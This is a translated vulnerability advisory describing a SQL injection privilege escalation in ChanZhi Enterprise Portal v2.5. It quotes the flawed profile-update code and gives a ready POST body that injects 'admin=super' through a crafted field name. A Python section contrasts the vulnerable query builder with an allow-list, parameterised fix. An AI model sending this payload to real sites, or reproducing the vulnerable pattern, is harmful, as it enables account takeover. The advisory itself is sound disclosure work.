ChanZhi (蝉知, "Cicada-known") Enterprise Portal System v2.5: SQL injection to admin - vulnerability warning - the black bar safety net

ID MYHACK58:62201454275
Type myhack58
Reporter 佚名 (anonymous)
Modified 2014-10-03T00:00:00


The problem lies in the place where a user edits their own profile information.


    public function edit($account = '')
    {
        if(!$account or RUN_MODE == 'front') $account = $this->app->user->account;
        if($this->app->user->account == 'guest') $this->locate(inlink('login'));
        if(!empty($_POST))
        {
            /* ... body omitted on the original page ... */
        }
        /* ... */
    }

    public function update($account)
    {
        /* If the user wants to change his password. */
        if($this->post->password1 != false)
        {
            /* ... password checks omitted on the original page ... */
            if(dao::isError()) return false;
            $password = $this->createPassword($this->post->password1, $account);
            $this->post->set('password', $password);
        }

        /* Every key of $_POST is taken over as a column to update; only the
         * literal key 'admin' is stripped for non-admin callers. */
        $user = fixer::input('post')
            ->cleanInt('imobile, qq, zipcode')
            ->setDefault('admin', 'no')
            ->remove('ip, account, join, visits')
            ->removeIF(RUN_MODE != 'admin', 'admin')
            ->get(); /* assumed terminator of the fixer chain */

        return $this->dao->update(TABLE_USER)
            ->data($user, $skip = 'password1,password2')
            ->batchCheck($this->config->user->require->edit, 'notempty')
            ->check('email', 'email')
            ->check('email', 'unique', "account!='$account'")
            ->checkIF($this->post->gtalk != false, 'gtalk', 'email')
            /* ... rest of the chain omitted on the original page ... */
    }




The fixer class is fairly long and is not posted here; from the code above you can roughly work out what it does.

Ordinary users and administrators live in the same table; the only difference is the admin field.

In short, the posted data is walked with a foreach and then passed into the update.

Of course it removes admin, but this is trivially bypassed.

Let's go straight to how it is exploited.

After registering a user, go to

http://localhost/user-edit.html to edit your profile.

Capture the edit request and post the following data:

realname=aaaaaa&email=a%40qqqq.com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&qq%3D1,admin=super&gtalk=

You are elevated to administrator.
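The bypass works because the posted field name is `qq=1,admin` (URL-decoded from `qq%3D1,admin`), which is not the literal key `admin` that remove() strips, and because the builder interpolates posted field names straight into the SET clause. The following Python model of that pattern, written as an added example and not code from ChanZhi, places the vulnerable builder beside an allow-list version; the table name `eps_user`, the account `victim` and the decoded POST body are constructed for the demonstration.

```python
import re

# Constructed sample: the advisory's POST body after URL decoding, i.e. what
# PHP would expose in $_POST. Note that the field *name* is "qq=1,admin".
POSTED = {
    "realname": "aaaaaa",
    "email": "a@qqqq.com",
    "qq=1,admin": "super",
}

TABLE_USER = "eps_user"  # assumed table name, stands in for the page's TABLE_USER
ALLOWED_COLUMNS = {"realname", "email", "company", "address", "zipcode",
                   "mobile", "phone", "qq", "gtalk"}
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def strip_admin_then_build(fields, account="victim"):
    """Vulnerable pattern from the page: drop the literal key 'admin', then
    trust every remaining key as a column name inside the SET clause."""
    fields = {k: v for k, v in fields.items() if k != "admin"}
    # keys are interpolated unquoted, so a key like "qq=1,admin" becomes SQL
    assignments = ", ".join(f"{k}='{v}'" for k, v in fields.items())
    return f"UPDATE {TABLE_USER} SET {assignments} WHERE account='{account}'"


def invalid_keys(fields, allowed=ALLOWED_COLUMNS):
    """Detection/validation step: keys that are not plain identifiers or not
    on the allow-list of user-editable columns."""
    return [k for k in fields if not IDENT.match(k) or k not in allowed]


def allowlist_then_build(fields, account="victim", allowed=ALLOWED_COLUMNS):
    """Hardened builder: reject unknown column names outright and bind values
    as parameters instead of interpolating them."""
    bad = invalid_keys(fields, allowed)
    if bad:
        raise ValueError(f"rejected field names: {bad}")
    cols = sorted(fields)
    sql = (f"UPDATE {TABLE_USER} SET "
           + ", ".join(f"`{c}`=%s" for c in cols)
           + " WHERE account=%s")
    params = [fields[c] for c in cols] + [account]
    return sql, params
```

The vulnerable builder yields `... SET realname='aaaaaa', email='a@qqqq.com', qq=1,admin='super' WHERE ...`, which MySQL happily executes as two assignments; the hardened one refuses the request before any SQL is built.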